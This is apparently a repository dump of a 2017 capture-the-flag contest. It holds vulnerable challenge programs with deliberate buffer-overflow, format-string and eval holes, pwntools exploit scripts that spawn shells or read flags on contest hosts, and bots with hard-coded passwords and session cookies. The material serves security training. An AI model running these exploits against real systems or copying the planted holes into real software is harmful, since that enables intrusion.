0===c.inputmask&&b().mask(c)})}).ready(function(){a(".inputmask, [data-inputmask], [data-inputmask-mask], [data-inputmask-alias]").each(function(a,c){void 0===c.inputmask&&b().mask(c)})})}); -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/codeception.yml: -------------------------------------------------------------------------------- 1 | actor: Tester 2 | paths: 3 | tests: tests 4 | log: tests/_output 5 | data: tests/_data 6 | helpers: tests/_support 7 | settings: 8 | bootstrap: _bootstrap.php 9 | memory_limit: 1024M 10 | colors: true 11 | modules: 12 | config: 13 | Yii2: 14 | configFile: 'config/test.php' 15 | cleanup: false 16 | 17 | # To enable code coverage: 18 | #coverage: 19 | # #c3_url: http://localhost:8080/index-test.php/ 20 | # enabled: true 21 | # #remote: true 22 | # #remote_config: '../codeception.yml' 23 | # whitelist: 24 | # include: 25 | # - models/* 26 | # - controllers/* 27 | # - commands/* 28 | # - mail/* 29 | # blacklist: 30 | # include: 31 | # - assets/* 32 | # - config/* 33 | # - runtime/* 34 | # - vendor/* 35 | # - views/* 36 | # - web/* 37 | # - tests/* 38 | -------------------------------------------------------------------------------- /2017-finals/soal/autodeploy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need team numbers as argument"; echo "$0 (team numbers)"; exit 4 | fi 5 | 6 | 7 | team_num=$1 8 | 9 | echo "Birthday Card" 10 | sleep 2 11 | (cd ./birthday_card && ./docker_build.sh birthday $team_num) 12 | 13 | echo "Buaya LSI" 14 | sleep 2 15 | (cd ./buaya_lsi && ./docker_build.sh buaya $team_num) 16 | 17 | echo "Cacah Jiwa" 18 | sleep 2 19 | #(cd ./cacah_jiwa && ./docker_build.sh cacah_jiwa $team_num) 20 | 21 | echo "How to Blog" 22 | sleep 2 23 | (cd ./howto_blog && ./docker_build.sh howto_blog $team_num) 24 | 25 | echo "Kudanil LSI" 26 | sleep 2 27 | #(cd ./kudanil_lsi && ./docker_build.sh kudanil_lsi $team_num) 28 | 29 | echo "Math Service" 30 | sleep 2 31 | (cd ./math_service && ./docker_build.sh math $team_num) 32 | 33 | echo "Musicality Icon" 34 | sleep 2 35 | (cd ./musicality_icon && ./docker_build.sh musicality_icon $team_num) 36 | 37 | echo "Sanca" 38 | sleep 2 39 | (cd ./sanca && ./docker_build.sh sanca $team_num) 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/css/one-page-wonder.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Start Bootstrap - One Page Wonder (http://startbootstrap.com/template-overviews/one-page-wonder) 3 | * Copyright 2013-2017 Start Bootstrap 4 | * Licensed under MIT (https://github.com/BlackrockDigital/startbootstrap-one-page-wonder/blob/master/LICENSE) 5 | */ 6 | 7 | body { 8 | padding-top: 54px; 9 | } 10 | 11 | @media (min-width: 992px) { 12 | body { 13 | padding-top: 56px; 14 | } 15 | } 16 | 17 | header.masthead { 18 | background: url('https://unsplash.it/1900/1080?image=304') no-repeat center center scroll; 19 | -webkit-background-size: cover; 20 | -moz-background-size: cover; 21 | background-size: cover; 22 | -o-background-size: cover; 23 | } 24 | 25 | header.masthead > .overlay { 26 | padding: 5rem 0; 27 | text-align: center; 28 | background: rgba(0, 0, 0, 0.6); 29 | } 30 | 31 | @media (min-width: 992px) { 32 | header.masthead > .overlay { 33 | padding: 10rem 0; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_6.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | def get_payload(): 3 | payload = open("solusi_6","r").read() 4 | return payload 5 | 6 | def get_flag(host,port): 7 | conn = remote(host,port) 8 | conn.recvuntil("6+5=") 9 | conn.sendline(get_payload()) 10 | flag = conn.recvuntil("}") 11 | conn.close() 12 | return flag 13 | 14 | 15 | def loop_through(): 16 | flags = [] 17 | for team in range(1,11): 18 | # ganti disiniii 19 | if team >9: 20 | team_str = str(team) 21 | else: 22 | team_str = '0'+str(team) 23 | port = int("3"+team_str+"06") 24 | flag = get_flag("agrihack.party",port) 25 | flags.append(flag.strip()) 26 | return flags 27 | 28 | 29 | 30 | def start(): 31 | flags = loop_through() 32 | count = 1 33 | file_out = open('out','w') 34 | for flag in flags: 35 | file_out.write(flag + ',' +str(count)+',6\n') 36 | count+=1 37 | 38 | 39 | 40 | start() 41 | -------------------------------------------------------------------------------- /2017-quals/exploitation/mrx/mrx.c: -------------------------------------------------------------------------------- 1 | //gcc -m32 mrx.c -o mrx 2 | //solution : python -c "print 'a'*96 + '\x10\xa0\x04\x08' + '134514036'" | ./mrx 3 | 4 | #include 5 | #include 6 | 7 | void __data() 8 | { 9 | system("/bin/cat flag"); 10 | } 11 | 12 | void check() 13 | { 14 | int pin1, pin2; 15 | 16 | printf("Pin please:"); 17 | scanf("%d", pin1); //bad scanf implementation 18 | fflush(stdin); 19 | 20 | printf("Pin again please:"); 21 | scanf("%d", pin2); //bad scanf implementation 22 | fflush(stdin); 23 | 24 | if(pin1 == 0x31337 && pin2 == 0xcafebabe) 25 | printf("You have been accepted"); 26 | } 27 | 28 | void whoami() 29 | { 30 | char name[100]; 31 | printf("who the f*** are you? "); 32 | scanf("%100s", name); 33 | } 34 | 35 | int main() 36 | { 37 | 38 | printf("==========MRX==========\n"); 39 | printf("1) No System Is Safe.\n"); 40 | printf("2) Aim for the Impossible.\n"); 41 | printf("3) Enjoy the real world as much as the net world.\n"); 42 | whoami(); 43 | check(); 44 | 45 | return 0; 46 | } 47 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/main.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | # set the project root directory as the static folder, you can set others. 3 | app = Flask(__name__) 4 | @app.route('/') 5 | @app.route('/') 6 | def root(index="index.html"): 7 | return app.send_static_file(index) 8 | 9 | @app.route('/static/css/') 10 | @app.route('/static/css') 11 | @app.route('/css') 12 | @app.route('/css/') 13 | def css(): 14 | return app.send_static_file("closer.html") 15 | 16 | @app.route('/css/') 17 | def send_css(filename): 18 | return send_from_directory('css', filename) 19 | 20 | @app.route('/robots.txt') 21 | def robot(): 22 | return 'disallow: /static/css/flag' 23 | 24 | @app.route('/static/css/portal/') 25 | @app.route('/static/css/portal') 26 | def thi(): 27 | return app.send_static_file("portal.html") 28 | 29 | @app.errorhandler(404) 30 | def page_not_found(e): 31 | return render_template('404.html'),404 32 | 33 | if __name__ == '__main__': 34 | app.run(host='0.0.0.0',port=80) 35 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/botsrc/comot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities 3 | from selenium.webdriver.common.action_chains import ActionChains 4 | import sys 5 | 6 | if(len(sys.argv) < 2): 7 | print('URL INPUT!!!') 8 | exit() 9 | 10 | url = sys.argv[1] 11 | caps = DesiredCapabilities.PHANTOMJS 12 | caps["phantomjs.page.settings.userAgent"] = "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1" 13 | 14 | driver = webdriver.PhantomJS(desired_capabilities=caps) 15 | driver.get('http://[DOMAIN]:PORT') 16 | 17 | driver.add_cookie({ 18 | 'domain': '.DOMAIN', 19 | 'name': 'session', 20 | 'value': 'b5470b800ef87a7018594959ccf4b339', 21 | 'httponly': 'true', 22 | 'path': '/', 23 | 'expires': 'Session' 24 | }) 25 | 26 | driver.get('http://[DOMAIN]:[PORT]/notes/'+url) 27 | 28 | name = driver.find_element_by_css_selector("html") 29 | ActionChains(driver).move_to_element(name).perform() 30 | -------------------------------------------------------------------------------- /2017-finals/bot/bot6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 21 | q = '{6:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '06' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('6+5=', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{3:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '03' 25 | ip = '192.168.8.236' 26 | try: 27 | a = remote(ip, port) 28 | hasil = a.recvuntil('Nama suami :', timeout = 2) 29 | if not hasil: 30 | raise e 31 | q += str(1) 32 | except: 33 | q += str(0) 34 | 35 | if i < 10: 36 | q += ',' 37 | q += ']}' 38 | print "[+] Query : ", q 39 | return q 40 | 41 | if __name__ == '__main__': 42 | while 1: 43 | real = time.time() 44 | b = time.time() 45 | 46 | submit(cek()) 47 | 48 | total = time.time() - b 49 | time.sleep(30-total) 50 | 51 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 21 | q = '{8:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '08' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('Type Anything You Want', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/sanca/sanca: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys,re 3 | 4 | class Unbuffered(object): 5 | def __init__(self, stream): 6 | self.stream = stream 7 | def write(self, data): 8 | self.stream.write(data) 9 | self.stream.flush() 10 | def writelines(self, datas): 11 | self.stream.writelines(datas) 12 | self.stream.flush() 13 | def __getattr__(self, attr): 14 | return getattr(self.stream, attr) 15 | 16 | sys.stdout = Unbuffered(sys.stdout) 17 | 18 | def XxxXxxx_xXxxxxx(s): 19 | return re.sub(r"[A-Za-z]+('[A-Za-z]+)?", 20 | lambda mo: mo.group(0)[0].upper() + 21 | mo.group(0)[1:].lower(), 22 | s) 23 | 24 | print """Sanca 2.0 25 | Type Anything You Want 26 | ____ 27 | ________________________/ O \___/ 28 | <_/_\_/_\_/_\_/_\_/_\_/_______/ \ 29 | 30 | """ 31 | while 1: 32 | try: 33 | print eval(XxxXxxx_xXxxxxx(raw_input(">>> "))) 34 | except KeyboardInterrupt: 35 | print " CTRL+Z to Exit" 36 | except Exception as e: 37 | print(e) 38 | -------------------------------------------------------------------------------- /2017-finals/bot/bot5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 21 | q = '{5:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '05' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('Dramaga Game Studios Present', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/templates/home.html: -------------------------------------------------------------------------------- 1 | 2 | 36 | 37 | 38 | 39 |

Happy Birthday %s!

40 |
41 | 42 |
43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/src/turuturu.c: -------------------------------------------------------------------------------- 1 | // gcc -D_FORTIFY_SOURCE=2 turuturu.c -o turuturu -fstack-protector-all -Wl,-z,relro,-z,now -fPIE -pie 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void printFlag(){ 9 | system("cat flag"); 10 | exit(0); 11 | } 12 | 13 | int main(){ 14 | setvbuf(stdout, NULL, _IONBF, 0); 15 | alarm(5); 16 | signal(SIGALRM, exit); 17 | int i; 18 | int pin[8]; 19 | char buff[8]; 20 | srand(time(NULL)); 21 | for(i=0;i<8;i++){ 22 | pin[i] = rand() % 10; 23 | } 24 | puts("[=== Turuturu ===]"); 25 | for(i=0; i<5; i++){ 26 | puts("Masukkan PIN:"); 27 | fgets(buff, 9, stdin); 28 | strtok(buff, "\n"); 29 | if((pin[0] == buff[0] - '0') && (pin[1] == buff[1] - '0') && (pin[2] == buff[2] - '0') && (pin[3] == buff[3] - '0') && (pin[4] == buff[4] - '0') && (pin[5] == buff[5] - '0') && (pin[6] == buff[6] - '0') && (pin[7] == buff[7] - '0')){ 30 | printFlag(); 31 | } 32 | printf("PIN: "); 33 | printf(buff); 34 | puts(", tidak sesuai!"); 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /2017-finals/bot/bot2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | 8 | 9 | def submit(q): 10 | print "[+] Submit query" 11 | a = remote('192.168.8.236', 1337) 12 | a.recvuntil('Username:') 13 | a.sendline('bot') 14 | a.recvuntil('Password:') 15 | a.sendline('awkarin') 16 | a.sendline(q) 17 | a.recvuntil('Done') 18 | a.close() 19 | print "[+] Done" 20 | 21 | def cek(): 22 | print "[+] Checking up service ....." 23 | q = '{2:[' 24 | for i in range(1, 11): 25 | port = '3' + str(i).zfill(2) + '02' 26 | ip = '192.168.8.236' 27 | try: 28 | a = remote(ip, port) 29 | hasil = a.recvuntil('Penangkaran Buaya LSI', timeout=2) 30 | if not hasil: 31 | raise e 32 | q += str(1) 33 | except: 34 | q += str(0) 35 | 36 | if i < 10: 37 | q += ',' 38 | a.close() 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/cacah.c: -------------------------------------------------------------------------------- 1 | // gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=4 cacah.c -o cacah 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | char *cmd = "/bin/sh"; 10 | 11 | struct nodes 12 | { 13 | char *nama; 14 | int umur; 15 | }; 16 | 17 | void init() 18 | { 19 | setvbuf(stdout, NULL, _IONBF, 0); 20 | } 21 | 22 | void libc_main() 23 | { 24 | system(cmd); 25 | } 26 | 27 | 28 | void welcome() 29 | { 30 | printf("Cacah Jiwa Online 31337\n"); 31 | } 32 | 33 | int main(int argc, char * argv[]) 34 | { 35 | init(); 36 | welcome(); 37 | 38 | struct nodes *node1, *node2, *node3; 39 | 40 | int umur; 41 | 42 | while(1) 43 | { 44 | node1 = malloc(sizeof(struct nodes)); 45 | node1->nama = malloc(8); 46 | node1->umur = 1; 47 | 48 | node2 = malloc(sizeof(struct nodes)); 49 | node2->nama = malloc(8); 50 | node1->umur = 2; 51 | 52 | printf("Nama suami : "); 53 | gets(node1->nama); 54 | 55 | printf("Nama istri : "); 56 | gets(node2->nama); 57 | 58 | fflush(stdin); 59 | } 60 | 61 | return 0; 62 | } -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/src/poc.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import re 3 | 4 | p = remote('cangkul.ittoday.web.id', 47000) 5 | 6 | 7 | temp = p.recvline() 8 | print temp 9 | cari = re.search('Nomor Pengguna: (.+?)\n', temp) 10 | youadd = eval("0" + cari.group(1)) 11 | youadd2 = p32(youadd + 2) 12 | youadd3 = p32(youadd + 4) 13 | youadd4 = p32(youadd + 6) 14 | youadd = p32(youadd) 15 | 16 | hspasi = 0x2068 - 16 17 | stripb = 0x622f - 0x2068 18 | inn = 0x6e69 - 0x622f 19 | strips = 0x732f - 0x6e69 20 | 21 | # /bin = '0x6e69622f' 22 | # /sh = '0x2068732f' 23 | 24 | # / '0x2f' 25 | # b '0x62' 26 | # i '0x69' 27 | # n '0x6e' 28 | # / '0x2f' 29 | # s '0x73' 30 | # h '0x68' 31 | # '0x20' 32 | 33 | # urutanpayload 34 | # youadd : stripb 35 | # youadd2 : inn 36 | # youadd3 : strips 37 | # youadd4 : hspasi 38 | payload1 = youadd4 + youadd + youadd2 + youadd3 + "%"+str(hspasi)+"x"+"%5$hn" + "%"+str(stripb)+"x"+"%6$hn" 39 | payload1 += "%"+str(inn)+"x"+"%7$hn" + "%"+str(strips)+"x"+"%8$hn" + "\x00" 40 | 41 | #payload1 42 | 43 | p.sendline(payload1) 44 | 45 | print payload1 46 | print p.recvline() 47 | p.interactive() 48 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def get_flag(host,port): 4 | 5 | context(arch='i386', bits=32, os='linux') 6 | a = remote(host,port) 7 | 8 | print a.recvuntil('Nama suami : ') 9 | a.sendline('a'*16 + p32(0x0804a010)) 10 | 11 | print a.recvuntil('Nama istri : ') 12 | a.sendline(p32(0x08048598)) 13 | 14 | 15 | a.sendline("whoami") 16 | dapat = a.recvline() 17 | flag = dapat.strip() 18 | a.close() 19 | return flag 20 | 21 | 22 | def loop_through(): 23 | flags = [] 24 | for team in range(1,11): 25 | # ganti disiniii 26 | if team >9: 27 | team_str = str(team) 28 | else: 29 | team_str = '0'+str(team) 30 | port = int("3"+team_str+"03") 31 | flag = get_flag("agrihack.party",port) 32 | flags.append(flag.strip()) 33 | return flags 34 | 35 | 36 | 37 | def start(): 38 | flags = loop_through() 39 | count = 1 40 | file_out = open('out','w') 41 | for flag in flags: 42 | file_out.write(flag + ',' +str(count)+',3\n') 43 | count+=1 44 | 45 | 46 | 47 | start() 48 | -------------------------------------------------------------------------------- /2017-finals/bot/bot1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{1:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '01' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'Celebrate It' not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{4:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '04' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'How To Blog | Home' not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{7:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '07' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'For those about to rock...' not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | submit(cek()) 48 | 49 | total = time.time() - b 50 | time.sleep(30-total) 51 | 52 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def get_flag(host,port): 5 | a = process('./start_tpl.sh') 6 | data = a.recvline() 7 | while "Run commands on the operating system" not in data: 8 | data = a.recvline() 9 | print data.strip() 10 | a.sendline('cat fl*') 11 | result = a.recvline() 12 | start_pos = result.find("HackToday") 13 | flag = result[start_pos:] 14 | print flag 15 | 16 | a.close() 17 | return flag.strip() 18 | 19 | 20 | def loop_through(): 21 | flags = [] 22 | for team in range(1,11): 23 | # ganti disiniii 24 | if team >9: 25 | team_str = str(team) 26 | else: 27 | team_str = '0'+str(team) 28 | port = int("3"+team_str+"01") 29 | flag = get_flag("agrihack.party",port) 30 | flags.append(flag.strip()) 31 | return flags 32 | 33 | 34 | 35 | def start(): 36 | flags = loop_through() 37 | count = 1 38 | file_out = open('out','w') 39 | for flag in flags: 40 | file_out.write(flag + ',' +str(count)+',1\n') 41 | count+=1 42 | 43 | 44 | #get_flag("agrihack.party",30108) 45 | start() 46 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/console.php: -------------------------------------------------------------------------------- 1 | 'basic-console', 8 | 'basePath' => dirname(__DIR__), 9 | 'bootstrap' => ['log'], 10 | 'controllerNamespace' => 'app\commands', 11 | 'components' => [ 12 | 'cache' => [ 13 | 'class' => 'yii\caching\FileCache', 14 | ], 15 | 'log' => [ 16 | 'targets' => [ 17 | [ 18 | 'class' => 'yii\log\FileTarget', 19 | 'levels' => ['error', 'warning'], 20 | ], 21 | ], 22 | ], 23 | 'db' => $db, 24 | ], 25 | 'params' => $params, 26 | /* 27 | 'controllerMap' => [ 28 | 'fixture' => [ // Fixture generation command line. 29 | 'class' => 'yii\faker\FixtureController', 30 | ], 31 | ], 32 | */ 33 | ]; 34 | 35 | if (YII_ENV_DEV) { 36 | // configuration adjustments for 'dev' environment 37 | $config['bootstrap'][] = 'gii'; 38 | $config['modules']['gii'] = [ 39 | 'class' => 'yii\gii\Module', 40 | ]; 41 | } 42 | 43 | return $config; 44 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/ContactCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/contact')); 10 | } 11 | 12 | public function contactPageWorks(AcceptanceTester $I) 13 | { 14 | $I->wantTo('ensure that contact page works'); 15 | $I->see('Contact', 'h1'); 16 | } 17 | 18 | public function contactFormCanBeSubmitted(AcceptanceTester $I) 19 | { 20 | $I->amGoingTo('submit contact form with correct data'); 21 | $I->fillField('#contactform-name', 'tester'); 22 | $I->fillField('#contactform-email', 'tester@example.com'); 23 | $I->fillField('#contactform-subject', 'test subject'); 24 | $I->fillField('#contactform-body', 'test content'); 25 | $I->fillField('#contactform-verifycode', 'testme'); 26 | 27 | $I->click('contact-button'); 28 | 29 | $I->wait(2); // wait for button to be clicked 30 | 31 | $I->dontSeeElement('#contact-form'); 32 | $I->see('Thank you for contacting us. We will respond to you as soon as possible.'); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/privilege_escalation/login.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 |

Login

18 |
19 |
20 |
21 | 22 | 23 |
24 |
25 | 26 | 27 |
28 | 29 | 30 | 31 |
32 | -------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/src/chatbot.c: -------------------------------------------------------------------------------- 1 | // gcc -o Hacktoday -fno-stack-protector -z execstack source.c -no-pie 2 | #include 3 | #include 4 | 5 | static char buf[1024]; 6 | static char response[1024]; 7 | 8 | void respon(){ 9 | snprintf(response, 0x400, buf); 10 | } 11 | 12 | void kirim() { 13 | setvbuf(stdout, NULL, _IONBF, 0); 14 | FILE *fp; 15 | int randomData, random; 16 | setvbuf(stdout, NULL, _IONBF, 0); 17 | fp = fopen("/dev/urandom", "r"); 18 | fread(&random, sizeof(int), 1, fp); 19 | random = abs(random); 20 | randomData = random; 21 | respon(); 22 | 23 | randomData = randomData % 3; 24 | printf("%s", response); 25 | 26 | if(randomData==0){ 27 | puts("Ya!"); 28 | } else if(randomData == 1){ 29 | puts("Tidak!"); 30 | } else { 31 | puts("Bisa jadi sih?"); 32 | } 33 | 34 | putchar('\n'); 35 | fflush(stdin); 36 | } 37 | 38 | int main() { 39 | setvbuf(stdout, NULL, _IONBF, 0); 40 | printf("Selamat datang di program chat bot\n"); 41 | printf("Masukan pertanyaan anda dan bot akan menjawab dengan 'Ya', 'Tidak', atau 'Bisa jadi'\n"); 42 | do { 43 | fgets(buf, 0x400, stdin); 44 | kirim(); 45 | } while(buf); 46 | } 47 | -------------------------------------------------------------------------------- /2017-quals/cryptography/WutDiHell/SecureChat/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "cryptonode", 3 | "version": "0.0.1", 4 | "description": "An encrypted chat program", 5 | "main": "app.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "node server.js" 9 | }, 10 | "repository": { 11 | "type": "git", 12 | "url": "git+https://github.com/Supernomad/CryptoNode.git" 13 | }, 14 | "keywords": [ 15 | "encrypted", 16 | "encryption", 17 | "aes", 18 | "aws256", 19 | "messaging", 20 | "messenger", 21 | "im", 22 | "instant" 23 | ], 24 | "author": "Supernomad ", 25 | "license": "Apache-2.0", 26 | "bugs": { 27 | "url": "https://github.com/Supernomad/CryptoNode/issues" 28 | }, 29 | "homepage": "https://github.com/Supernomad/CryptoNode#readme", 30 | "dependencies": { 31 | 